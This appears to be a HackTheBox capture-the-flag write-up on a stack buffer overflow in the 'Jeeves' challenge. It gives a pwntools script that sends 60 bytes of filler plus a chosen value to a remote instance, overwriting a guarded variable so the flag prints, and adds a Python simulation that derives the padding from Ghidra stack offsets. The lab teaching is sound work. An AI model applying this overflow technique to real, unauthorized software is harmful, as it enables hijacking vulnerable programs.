We covered a scenario of a binary vulnerable to a buffer overflow. The binary has NX and PIE enabled, which rule out executing shellcode on the stack and hardcoding addresses respectively, so we opened it in Ghidra (using its decompiler rather than a debugger) and built the exploitation methodology around the stack offsets of two local variables: the input buffer and the variable that controls entry into an if statement that prints the flag. The objective was to overflow the buffer so that the write runs into that variable, sets it to the value the comparison expects, and lets the execution flow enter the if statement. This was part of the HackTheBox Jeeves Intro to Binary Exploitation Track.

Buffer Overflow Techniques Notes

The exploit code is below (corrected to working pwntools for Python 3; fill in the instance's ip and port and the expected value read from the decompiled comparison).

##Beginning

from pwn import *

# Connect to the remote instance. "ip" and port are placeholders for the
# HTB instance's address. Spawning process("nc") and then sending "ip port"
# never worked: that starts nc with no arguments and feeds the address to
# its stdin instead of opening a connection.
target = remote("ip", port)

# 60 bytes of filler are the distance on the stack between the input buffer
# and the variable that guards the if statement, as measured in Ghidra.
payload = b"A" * 60

# Append the value the if statement compares against, little-endian.
# p64 already returns bytes, so no decode()/string juggling is needed.
payload += p64(value)

target.sendline(payload)

# Read the response, which should now contain the flag.
print(target.recvuntil(b"."))

##Ending
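Where the 60 in the payload comes from, as an added worked example that is not part of the original walkthrough: Ghidra auto-names unnamed stack slots local_<hex>, where <hex> is the slot's distance below the frame base, so the padding between the input buffer and the guarded variable is the difference of the two numbers, and the buffer (larger offset, lower address) is overrun upward into the variable. The names local_48 and local_c, the model frame size and the test values below are assumptions chosen so the arithmetic reproduces the page's 60; read the real names off the decompiled function. struct stands in for pwntools' p64/p32 so this runs without pwntools installed.

```python
import struct

# Assumed Ghidra auto-generated names for the two locals (not taken from the
# page). Ghidra names an unnamed stack slot local_<hex>, where <hex> is how
# far below the frame base the slot starts, so local_48 starts 0x48 bytes
# below it and local_c starts 0xc bytes below it.
BUFFER_VAR = "local_48"   # char array the input is read into (assumed name)
TARGET_VAR = "local_c"    # variable compared in the if statement (assumed name)
FRAME_SIZE = 0x50         # model frame big enough to hold both slots (assumed)


def ghidra_stack_offset(name):
    """Return the frame-base-relative distance encoded in a Ghidra local_<hex> name."""
    prefix = "local_"
    if not name.startswith(prefix):
        raise ValueError(f"{name!r} is not a Ghidra auto-named stack variable")
    return int(name[len(prefix):], 16)


def padding_to_target(buffer_var, target_var):
    """Bytes of filler needed before an overflow of buffer_var reaches target_var.

    Both slots lie below the frame base, so the slot with the larger offset sits
    at the lower address. A forward write starting in the buffer therefore walks
    up into the target, and the distance between the two starts is the padding.
    """
    distance = ghidra_stack_offset(buffer_var) - ghidra_stack_offset(target_var)
    if distance <= 0:
        raise ValueError("target is not above the buffer; a forward overflow cannot reach it")
    return distance


def build_payload(padding, value, width=8):
    """Filler followed by the desired value, little-endian.

    struct.pack here does what pwntools' p64 (width=8) or p32 (width=4) does;
    pick the width that matches the target variable's type in the decompiler.
    """
    fmt = {4: "<I", 8: "<Q"}[width]
    return b"A" * padding + struct.pack(fmt, value)


def simulate_overflow(payload, buffer_var, target_var, width=8, frame_size=FRAME_SIZE):
    """Model the stack frame as bytes, copy the payload into the buffer slot
    with no length check (the bug), and return what the target slot then holds."""
    frame = bytearray(frame_size)
    buf_pos = frame_size - ghidra_stack_offset(buffer_var)
    tgt_pos = frame_size - ghidra_stack_offset(target_var)
    # Unchecked write: anything longer than the buffer spills into higher slots.
    frame[buf_pos:buf_pos + len(payload)] = payload
    fmt = {4: "<I", 8: "<Q"}[width]
    return struct.unpack(fmt, bytes(frame[tgt_pos:tgt_pos + width]))[0]


if __name__ == "__main__":
    padding = padding_to_target(BUFFER_VAR, TARGET_VAR)
    wanted = 0x1122334455667788  # placeholder for the value the if statement expects
    payload = build_payload(padding, wanted)
    print(f"padding = {padding} bytes, payload = {len(payload)} bytes")
    print(f"target slot after overflow = {simulate_overflow(payload, BUFFER_VAR, TARGET_VAR):#x}")
```

Swapping in the names Ghidra actually shows for the input buffer and the compared variable gives the real padding; if the compared variable is a 4-byte int, use width=4 so the value lands exactly on it rather than spilling four extra bytes past it.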

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
